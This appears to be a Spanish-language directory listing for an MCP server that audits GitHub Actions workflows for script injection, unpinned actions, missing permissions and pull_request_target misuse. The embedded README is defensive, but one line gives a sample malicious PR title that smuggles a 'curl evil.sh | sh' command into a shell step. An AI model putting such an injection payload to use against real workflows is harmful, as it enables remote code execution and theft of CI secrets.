Skip to main content
ClaudeWave
tylerscomic-lab avatar
tylerscomic-lab

github-actions-audit-mcp

Ver en GitHub
MCP ServersRegistry oficial0 estrellas0 forks● JavaScriptMITActualizado today
ClaudeWave Trust Score
77/100
✓ Trusted
Passed
  • ✓Open-source license (MIT)
  • ✓Actively maintained (<30d)
  • ✓Topics declared
  • ✓Documented (README)
Flags
  • !No description
  • !Install pipes a remote script into a shell (curl | sh)
Last scanned: 10/2/2026
Install in Claude Code / Claude Desktop
Method: Manual
Claude Code CLI
git clone https://github.com/tylerscomic-lab/github-actions-audit-mcp
claude_desktop_config.json (Claude Desktop)
{
  "mcpServers": {
    "github-actions-audit-mcp": {
      "command": "node",
      "args": ["/path/to/github-actions-audit-mcp/dist/index.js"]
    }
  }
}
1. Run the command above in your terminal (Claude Code), or paste the JSON config into claude_desktop_config.json (Claude Desktop).
2. Replace any <placeholder> values with your API keys or paths.
3. Restart Claude. The MCP server and its tools appear automatically.
💡 Clone https://github.com/tylerscomic-lab/github-actions-audit-mcp and follow its README for install instructions.
Casos de uso

Resumen de MCP Servers

# github-actions-audit-mcp

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE)
[![Live on MCPize](https://img.shields.io/badge/Live%20on-MCPize-6d28d9)](https://mcpize.com/mcp/github-actions-audit-mcp)

An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual
incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to
what workflow files actually use), not string/regex matching against the raw file.

## What it catches

**Script injection.** Any `${{ github.event.issue.title }}`-style expression that carries attacker-controlled text
(issue/PR titles, comments, review bodies, branch names) interpolated directly into a `run:` shell step. The
expression is substituted into the generated shell script *before* the shell runs it — a PR titled `"; curl evil.sh
| sh #` becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions
vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.

**Unpinned third-party actions.** `uses: some-action@v4` or `@main` can be repointed by whoever controls that
tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the
[tj-actions/changed-files compromise](https://github.com/tj-actions/changed-files) (March 2025), where a maintainer's
PAT was used to retag `v35`–`v46` to point at a credential-harvesting commit. Only a full 40-character commit SHA is
immutable.

**Missing `permissions:` blocks.** No explicit `permissions:` means the `GITHUB_TOKEN` defaults to whatever your
repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.

**`pull_request_target` + head checkout.** This trigger runs with the base repo's secrets and a write-scoped token
(unlike plain `pull_request`), and if the workflow also checks out the PR's own head commit, a fork's PR can run
arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.

## Tools

### `audit_workflow`
Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's
dangerous, and a concrete fix.

### `check_expression_injection`
Focused check on a single shell command string, for when you just want to sanity-check one `run:` step without a
full workflow file.

## Use it

**Hosted (recommended):** [MCPize](https://mcpize.com/mcp/github-actions-audit-mcp) — free tier, $7/mo Pro.

**Self-host:**
```bash
npm install
node server.js
```

## Part of a small suite

[regex-safety-audit-mcp](https://github.com/tylerscomic-lab/regex-safety-audit-mcp),
[mcp-trust-audit-mcp](https://github.com/tylerscomic-lab/mcp-trust-audit-mcp),
[secrets-leak-audit-mcp](https://github.com/tylerscomic-lab/secrets-leak-audit-mcp),
[dockerfile-audit-mcp](https://github.com/tylerscomic-lab/dockerfile-audit-mcp).

## License

MIT
ci-cdgithub-actionsmcpmcp-servermodel-context-protocolsecurity

Lo que la gente pregunta sobre github-actions-audit-mcp

¿Qué es tylerscomic-lab/github-actions-audit-mcp?

+

tylerscomic-lab/github-actions-audit-mcp es mcp servers para el ecosistema de Claude AI con 0 estrellas en GitHub.

¿Cómo se instala github-actions-audit-mcp?

+

Puedes instalar github-actions-audit-mcp clonando el repositorio (https://github.com/tylerscomic-lab/github-actions-audit-mcp) o siguiendo las instrucciones del README en GitHub. ClaudeWave también te ofrece bloques de instalación rápida en esta misma página.

¿Es seguro usar tylerscomic-lab/github-actions-audit-mcp?

+

Nuestro agente de seguridad ha analizado tylerscomic-lab/github-actions-audit-mcp y le ha asignado un Trust Score de 77/100 (tier: Trusted). Revisa el desglose completo de comprobaciones superadas y flags en esta página.

¿Quién mantiene tylerscomic-lab/github-actions-audit-mcp?

+

tylerscomic-lab/github-actions-audit-mcp es mantenido por tylerscomic-lab. La última actividad registrada en GitHub es del 2026-10-01, con 0 issues abiertos.

¿Hay alternativas a github-actions-audit-mcp?

+

Sí. En ClaudeWave puedes explorar mcp servers similares en /categories/mcp, ordenados por popularidad o actividad reciente.

Despliega github-actions-audit-mcp en tu cloud

Lleva este repo a producción en minutos. Cada plataforma genera su propio entorno con variables de entorno editables.

¿Mantienes este repo? Añade un badge a tu README

Pega el badge en tu README de GitHub para mostrar que está auditado por ClaudeWave. Cada badge enlaza de vuelta a esta página y muestra el Trust Score actual.

Featured on ClaudeWave: tylerscomic-lab/github-actions-audit-mcp
[![Featured on ClaudeWave](https://claudewave.com/api/badge/tylerscomic-lab-github-actions-audit-mcp)](https://claudewave.com/repo/tylerscomic-lab-github-actions-audit-mcp)
<a href="https://claudewave.com/repo/tylerscomic-lab-github-actions-audit-mcp"><img src="https://claudewave.com/api/badge/tylerscomic-lab-github-actions-audit-mcp" alt="Featured on ClaudeWave: tylerscomic-lab/github-actions-audit-mcp" width="320" height="64" /></a>

Más MCP Servers

Alternativas a github-actions-audit-mcp